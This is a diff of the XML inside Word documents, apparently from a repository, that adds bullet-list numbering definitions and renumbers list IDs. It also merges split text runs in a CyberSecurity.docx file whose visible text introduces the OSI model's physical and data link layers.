+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p/>
+    <w:p/>
     <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -12621,6 +16357,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="285A40ED"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6548179C"/>
+    <w:lvl w:ilvl="0" w:tplc="40090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="28755231"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AEC09966"/>
@@ -12733,7 +16582,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C533112"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="52DE695A"/>
@@ -12846,7 +16695,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C80678E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EF66D31E"/>
@@ -12959,7 +16808,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2CB97ECF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3D763EB8"/>
@@ -13072,7 +16921,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2EC916C9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9744997E"/>
@@ -13158,7 +17007,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2F756123"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8F9A7344"/>
@@ -13244,7 +17093,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35D56A6F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="13D67F38"/>
@@ -13330,7 +17179,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3BBA210B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9392F422"/>
@@ -13443,7 +17292,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3C4C7B79"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4F5C0A08"/>
@@ -13556,7 +17405,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="40413435"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="30186B74"/>
@@ -13669,7 +17518,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="42A20738"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5E1240AE"/>
@@ -13782,7 +17631,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="43EF75BB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B54C9A6A"/>
@@ -13895,7 +17744,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="466B2C0A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="81CABED2"/>
@@ -14008,7 +17857,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CFB7364"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="13FCFC6A"/>
@@ -14121,7 +17970,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5103291A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E564C9B0"/>
@@ -14234,7 +18083,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="56746C9B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="93687E9C"/>
@@ -14347,7 +18196,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="58D63FD5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FB7A028A"/>
@@ -14460,7 +18309,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5AEA7BFF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7DFE11AE"/>
@@ -14573,7 +18422,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64E4550A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6C765CC8"/>
@@ -14686,7 +18535,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6B62602D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="DD1AA9EC"/>
@@ -14799,7 +18648,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6DA176D3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BE0E9F7C"/>
@@ -14912,7 +18761,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="782F7235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="65A04688"/>
@@ -15025,7 +18874,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="34" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D795EE6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F3F82F6E"/>
@@ -15138,8 +18987,121 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="35" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7E0727F2"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="498CD1DA"/>
+    <w:lvl w:ilvl="0" w:tplc="40090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="25"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -15169,7 +19131,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="33"/>
+    <w:abstractNumId w:val="34"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -15199,7 +19161,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="32"/>
+    <w:abstractNumId w:val="33"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -15259,7 +19221,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -15289,7 +19251,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -15319,7 +19281,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="27"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -15349,7 +19311,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="22"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -15379,7 +19341,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="27"/>
+    <w:abstractNumId w:val="28"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -15409,28 +19371,28 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="31"/>
+    <w:abstractNumId w:val="32"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="31"/>
+    <w:abstractNumId w:val="32"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="14">
     <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="15">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="8"/>
@@ -15439,7 +19401,7 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="20">
-    <w:abstractNumId w:val="29"/>
+    <w:abstractNumId w:val="30"/>
   </w:num>
   <w:num w:numId="21">
     <w:abstractNumId w:val="6"/>
@@ -15448,16 +19410,16 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="23">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="24">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:num w:numId="25">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="26">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="27">
     <w:abstractNumId w:val="4"/>
@@ -15466,16 +19428,16 @@
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="29">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="30">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="31">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="32">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="33">
     <w:abstractNumId w:val="2"/>
@@ -15484,7 +19446,13 @@
     <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="35">
-    <w:abstractNumId w:val="30"/>
+    <w:abstractNumId w:val="31"/>
+  </w:num>
+  <w:num w:numId="36">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="37">
+    <w:abstractNumId w:val="35"/>
   </w:num>
 </w:numbering>
 </file>
@@ -17691,7 +21659,7 @@
   <dgm:whole/>
   <dgm:extLst>
     <a:ext uri="http://schemas.microsoft.com/office/drawing/2008/diagram">
-      <dsp:dataModelExt xmlns:dsp="http://schemas.microsoft.com/office/drawing/2008/diagram" relId="rId127" minVer="http://schemas.openxmlformats.org/drawingml/2006/diagram"/>
+      <dsp:dataModelExt xmlns:dsp="http://schemas.microsoft.com/office/drawing/2008/diagram" relId="rId126" minVer="http://schemas.openxmlformats.org/drawingml/2006/diagram"/>
     </a:ext>
   </dgm:extLst>
 </dgm:dataModel>
@@ -19831,10 +23799,12 @@
     <w:rsid w:val="004E6FD1"/>
     <w:rsid w:val="004F3814"/>
     <w:rsid w:val="005D2E6F"/>
+    <w:rsid w:val="0065371D"/>
     <w:rsid w:val="006E4C0C"/>
     <w:rsid w:val="007761E0"/>
     <w:rsid w:val="008849E7"/>
     <w:rsid w:val="008C31A7"/>
+    <w:rsid w:val="00901D3A"/>
     <w:rsid w:val="00A418DD"/>
     <w:rsid w:val="00BC42A6"/>
     <w:rsid w:val="00D90DF0"/>
@@ -20569,7 +24539,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{22D67FE3-C5B1-48D0-9DEC-03E6940CB2A6}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F13129F9-7D4B-4909-8743-D7ACE89BEB4E}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/CyberSecurity.docx
+++ b/CyberSecurity.docx
@@ -101,25 +101,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">‘, in the year 1974. It is a 7 layer architecture with each layer having specific functionality to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>performed</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. All these 7 layers work collaboratively to transmit the data from one person to another across the globe. </w:t>
+        <w:t xml:space="preserve">‘, in the year 1974. It is a 7 layer architecture with each layer having specific functionality to performed. All these 7 layers work collaboratively to transmit the data from one person to another across the globe. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -218,20 +200,8 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>1. Physical Layer (Layer 1</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-        </w:rPr>
-        <w:t>) :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>1. Physical Layer (Layer 1) :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -341,18 +311,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">The functions of the physical layer </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>The functions of the physical layer are :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -466,25 +426,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Physical layer specifies the way in which the different, devices/nodes are arranged in a network i.e. bus, star or mesh </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>topolgy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> Physical layer specifies the way in which the different, devices/nodes are arranged in a network i.e. bus, star or mesh topolgy.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -612,20 +554,8 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>2. Data Link Layer (DLL) (Layer 2</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-        </w:rPr>
-        <w:t>) :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>2. Data Link Layer (DLL) (Layer 2) :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -651,18 +581,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">Data Link Layer is divided into two sub </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>layers :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Data Link Layer is divided into two sub layers :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -723,25 +643,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
